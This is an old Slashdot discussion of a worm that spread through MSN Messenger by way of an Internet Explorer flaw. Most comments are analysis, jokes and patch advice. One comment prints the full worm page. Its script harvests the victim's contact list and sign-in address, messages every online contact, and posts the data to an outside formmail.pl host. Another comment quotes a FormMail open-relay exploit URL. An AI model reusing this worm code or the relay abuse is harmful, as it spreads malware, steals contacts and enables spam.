Microsoft Instant Messenger Virus Sweeps Net 401
Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.
There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.
Sophistication: moderate. Damage: only your pride.
Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.
Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?
this didn't infect me.. (Score:2, Funny)
Well, that's one less effectual site for vectoring (Score:5, Funny)
Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em
Re:Well, that's one less effectual site for vector (Score:3, Interesting)
Re:Well, that's one less effectual site for vector (Score:2, Informative)
Re:Well, that's one less effectual site for vector (Score:2, Insightful)
Plus, since the topic author knew the exact URL from somewhere, it must have already been fairly widespread before it got here
in the eye of the beholder (Score:3, Funny)
ToO mAnY cApS!!!11 (Score:5, Funny)
Re:CAPITALS ARE GOOD (Score:5, Funny)
Is that the Yahoo! version of COBOL?
Other clients? (Score:5, Insightful)
Mark
Re:Other clients? (Score:5, Informative)
Re:Other clients? (Score:2, Informative)
Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.
Re:Other clients? (Score:2)
Re:Other clients? (Score:2)
Anyone surprised? (Score:2, Insightful)
Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.
Don't use microsoft products, so I am not vulnerable. Happy me.
what's the url? (Score:4, Funny)
Re:what's the url? (Score:3, Funny)
That reminds me, I wish MSN had tone markup's..
they've got enough of those dumb smiley faces.
Re:what's the url? (Score:2)
The Code (Score:5, Informative)
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F7956
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
Re:The Code (Score:2, Informative)
--19:08:55-- http://www.masenko-media.net/cool.html => `cool.html' Connecting to www.masenko-media.net:80... connected! HTTP request sent, awaiting response... 404 Not Found 19:08:55 ERROR 404: Not Found.
Seems they took it down? Now is this just going to have millions of people getting 404 messages?
Re:The Code (Score:4, Insightful)
Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)
Re:The Code (Score:2)
Sends mail too .. email address harvesting? (Score:5, Informative)
<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">
I think somebody forgot that HTML source can be viewed
The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
Re:Sends mail too .. email address harvesting? (Score:2)
Re:The Code (Score:2, Interesting)
> msnWin.resizeTo(1, 1);
> msnWin.moveTo(10000, 10000);
> msnWin.document.title = "Please Wait...";
This is a particularly annoying tactic that some popup ads use, where you create a new full screen window (only works in IE) then resize it and move it. The result is a window that has no border at all, and the malicious ad can then display a 'windows like' dialog image that can easily fool your average windows user into clicking.
Javascript flame (Score:2, Flamebait)
I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.
Web browsers shouldn't even include it anymore.
Re:The Code (Score:3, Insightful)
could be a lot worse, likely will be soon (Score:5, Interesting)
I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.
It worked too. Got to log into MSN as the CTO of our company, just to make a point.
As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.
Not a Messenger flaw (Score:5, Informative)
First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.
Install the patch and be done with it.
Re:Not a Messenger flaw (Score:5, Insightful)
Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?
Re:Not a Messenger flaw (Score:4, Interesting)
Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.
So, in conclusion, your argument is completely irrelevant to the topic at hand
Re:Not a Messenger flaw (Score:3, Insightful)
Maybe the problems you're talking about went away in Windows? For someone who is so up to date on Linux, you should learn a little about Windows before you bash it for past problems.
Re:Not a Messenger flaw (Score:3, Insightful)
A couple of things:
As someone thats "so up to date on windows", you should learn a little about it before you start to talk about it.
Everything has problems microsoft just puts the problems into the hands of people that cannot fix it, the end user.
Re:Not a Messenger flaw (Score:4, Insightful)
Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).
IE has the biggest marketshare, and Windows has the biggest desktop marketshare, but the reason that people attack Windows systems is it's easy. I wish people would stop kidding themselves with the market share excuse. MS software has serious design flaws which makes it very easy to exploit a flaw in the browser to extract data from the registry and mail that off to some email address. Under windows, that is easy, under Linux there are multiple different browsers, you don't know what email client might be available, there is no central place to grab system/user info and there is no easy way to automate the process. The same type of exploit is used over and over and over again, yet for every patch MS releases, someone finds a new way to write an exploit that uses the same basic method. How long, exactly, do you think it's going to take before Microsoft recognizes this and fixes the design flaws instead of releasing patches which amount to little more then sticking their finger in the crack in the dam?
Re:Not a Messenger flaw (Score:3, Insightful)
And while we're at it, this isn't a Warhol worm either.
I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.
Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.
Re:Not a Messenger flaw (Score:4, Interesting)
1. Download the patch.
2. Install the patch.
3. Reboot.
Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.
Re:Not a Messenger flaw (Score:3, Funny)
On all 5000 desktops of your corporation.
interesting article on the reg (Score:5, Informative)
Re:interesting article on the reg (Score:2, Insightful)
Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch? C'mon.
Btw, WindowsUpdate prompts you to install this patch, I don't see what else should have been done about it ("this bug should not have been there" rants don't count as a solution).
Re:interesting article on the reg (Score:5, Funny)
You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.
In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.
If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.
The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issueing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.
Thus, I've proven that the free market will take care of MS on it's own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.
I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
"By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."
Re:interesting article on the reg (Score:2)
Perhaps that is why a patch is already available which fixes this problem? (And has been available for a while.)
Re:interesting article on the reg (Score:2)
Kinda funny.. (Score:5, Funny)
Warhol? worm (Score:5, Informative)
Re:Warhol? worm (Score:3, Funny)
Not so sure the story is accurate. (Score:4, Interesting)
FormMail.pl is the perl script which recieves this information. It is pretty interesting...
Re:Not so sure the story is accurate. (Score:2, Interesting)
24.90.121.snip - - [12/Feb/2002:00:38:16 -0500] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject= bbx%2Eflarp%2Enet%2Fcgi%2Dbin%2Fformmail%2Epl&reci pient=icases0ber%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 295 "-" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
It's RoadRunner cable modem service apparently, and the browser info is obviously going to be rubbish.
Finally! (Score:5, Funny)
Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?
Microsoft Article Virus Sweeps Slashdot (Score:3, Funny)
- Microsoft Instant Messenger Virus Sweeps Net [slashdot.org]
- What is
.NET? [slashdot.org]
- States Demand Windows Source Code [slashdot.org]
- Details of MSFT's Antitrust Lobbying [slashdot.org]
There were none yesterday, or the day before... the calm before the storm...It's only a matter of time... (Score:4, Insightful)
It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.
The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.
worm primer (Score:2, Interesting)
not that i was expecting it to work.
what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -
Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.
This is dumber than a mail worm (Score:3, Insightful)
But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.
Re:This is dumber than a mail worm (Score:2, Informative)
Re:This is dumber than a mail worm (Score:2, Informative)
It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.
Re:This is dumber than a mail worm (Score:2)
Ah yes, I didn't see that, my fault. Still though, I got emails from friends with a strange vague "Go there it's cool" line, and that sounded odd enough that I didn't open them (i.e. it didn't sound like it came from that person, and even if it could have, it was too impersonal to be true). Turned out to be from an Outlook virus when I checked later.
Not that URL (Score:2)
GET
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)
HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>
(No Micros**t anywhere on these machines. Cheers!)
Re:Not that URL (Score:2)
hmmm.... well, i'm not really familiar with mod_bwlimited, but it sounds like a module for limitimg the bandwidth used by certain pages. (correct me if i'm being an idiot.)
assuming i'm right, this really wasn't the place to put virus code. even though it's only a smallish html document, all the hits you can get from a virus would really add up. so you've already limited the spread of the virus. although, i'd bet it's just free web space, and <aphorism>beggars can't be choosers</aphorism>
One shoe drops (Score:5, Interesting)
The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.
Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)
Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.
Re:One shoe drops (Score:5, Insightful)
- Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.Careful with your statistics (Score:2, Interesting)
Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.
Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)
Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.
formmail.pl (Score:5, Informative)
Formmail.pl Can Be Used As An Open Mail Relay
Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.
Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).
Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to
Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.
Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
Re:formmail.pl (Score:3, Informative)
Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice devlopers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).
Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.
It could be worse... (Score:4, Funny)
"Go To http://www.goatse.cx NoW !!!"
Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...
Re:It could be worse... (Score:2)
Re:It could be worse... (Score:2)
goatse.cx is down since February 2 or so
Haven't you noticed?
Re:It could be worse... (Score:2)
So THAT's where the formmail.pl requests (Score:2)
I know that formmail.pl has some vulnerabilities, and figured people were just probing me.
This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with
Have any A/V Companies... (Score:3, Informative)
I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?
Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.
That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.
-l
P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company.
Re:Have any A/V Companies... (Score:2)
-- Our bits are better, they're gold plated.
Oops (Score:3, Funny)
Why this is news (Score:3, Informative)
Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.
How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...
And it's better to find out about these things in the news, not the hard way!
Erlang Virus Propagation System (Score:5, Interesting)
Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.
An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.
As I recall, there was a story on
Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!
Month half over (Score:4, Funny)
For all you Primus fans (Score:2)
(Prof. Nutbutter / Tales from the Punchbowl)
NOT a "Warhol Worm", just topologically aware (Score:5, Informative)
Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.
It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.
For those who are interested, a more formal analysis is available Here [berkeley.edu], a paper I submitted to Usenix Security on the subject.
I hope that the virus writers... (Score:2, Funny)
Don't they know that virus making will soon be considered a hate crime? [satirewire.com]
On another note, I wonder how many victims of the Warhol virus also caught this recent virus. [bbspot.com]
In related news (Score:4, Funny)
E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.
Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".
"This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.
Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.
Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"
Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."
Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".
A bunch of "old" features. (Score:2)
Then there is some hardcoded urls into Messenger that allow certain sites obtain your email adr. and the emails adr. of the people in your contact list. thise sites include microsoft.com, hotmail.com.
Hmm thinking about whipping up an example on my website,, heh could be fun.
This got me thinking (Score:2)
Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.
People clicking on links... (Score:5, Funny)
I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."
When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"
Didn't know what to say to that.
Re:People clicking on links... (Score:5, Funny)
Well, duh. Two words:
"Prove it!"
Where is Windows Update? (Score:3, Insightful)
Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?
Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes i adminster at work, scheduled them to be updated, done. I got look for an SNMP update for my Windows servers, none found.
It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...
The joys or irony... (Score:2, Funny)
< What is
You gotcher answer, folks.
Don't click on links in article description! (Score:2, Informative)
When it rains, it pours? (Score:2)
It's 9:35 pm EST, and Windows Update [microsoft.com] seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?
Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.
Duhhhh... Why not... (Score:5, Funny)
cheap shot (Score:2, Funny)
It's evolved (Score:2, Insightful)
URGENT - Go to http://users.skynet.be/dark.angel/cool.htm
I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapdily became clear. Anyone peaked at this to see if the code is essentially the same?
--
From Phil
Explanation of code (Score:3, Informative)
We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.
We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.
This new worm, although harmless, is a direct rip of the example code [slashdot.org] from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.
As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.
The next MSN worm might be far worse.
Please, please all Internet Explorer users patch your systems now [microsoft.com]. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.
I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?
Only the paranoid will survive... (Score:3, Funny)
"Sorry, there was an error in the script.
This may well be due to your IE security settings - try resetting them to default and trying again.
..."
IE6 is much better when it comes to security and privacy than IE5.
Re:Forwards are evil / Virus news (Score:2, Insightful)
The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!
Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math.
No system is 100% secure. Period, end of story.
MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunatly, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF i want it, I'll turn it on.
badger
Re:No DNS Record? (Geeky Observations) (Score:2, Informative)
MASENKO-MEDIA.NET WHOIS results:
The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM
Re:No DNS Record? (Geeky Observations) (Score:5, Informative)
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
Looks fine to me..:)
BWP
Re:This is news? (Score:2, Informative)
Re:This is news? (Score:2)
Bzzt yourself. Messenger is integrated with at least Outlook, and I suspect IE 6. (IE can make API calls to Messenger, regardless.) And you have apparently never used XP, where it seemingly pervades the entire system. *shudders*
Re:This is news? (Score:2)
Re:The solution... (Score:2, Interesting)
Re:Gee... (Score:4, Informative)
According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
Re:Gee... (Score:5, Informative)
A quick Google search for "risks digest eye surgery" yields this link [ncl.ac.uk]. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.
Re:Gee... (Score:2, Insightful)
Windows 95 is pretty stable if you use it as a single-tasking OS. I mean, there are still point-of-sale systems running DOS, and that provides just slightly less memory protection than Windows 95 does. Just don't blame the OS vendor for a shoddily-written third-party program.
Re:Know how to stop IE from launching MSN Msgr? (Score:5, Informative)
Remove the following registry keys:
HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A44
HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D9
HKEY_CLASSES_ROOT\Messenger.MsgrObject
and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...
You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.
You'll need to remove them again if you upgrade or reinstall - it'll put the references back.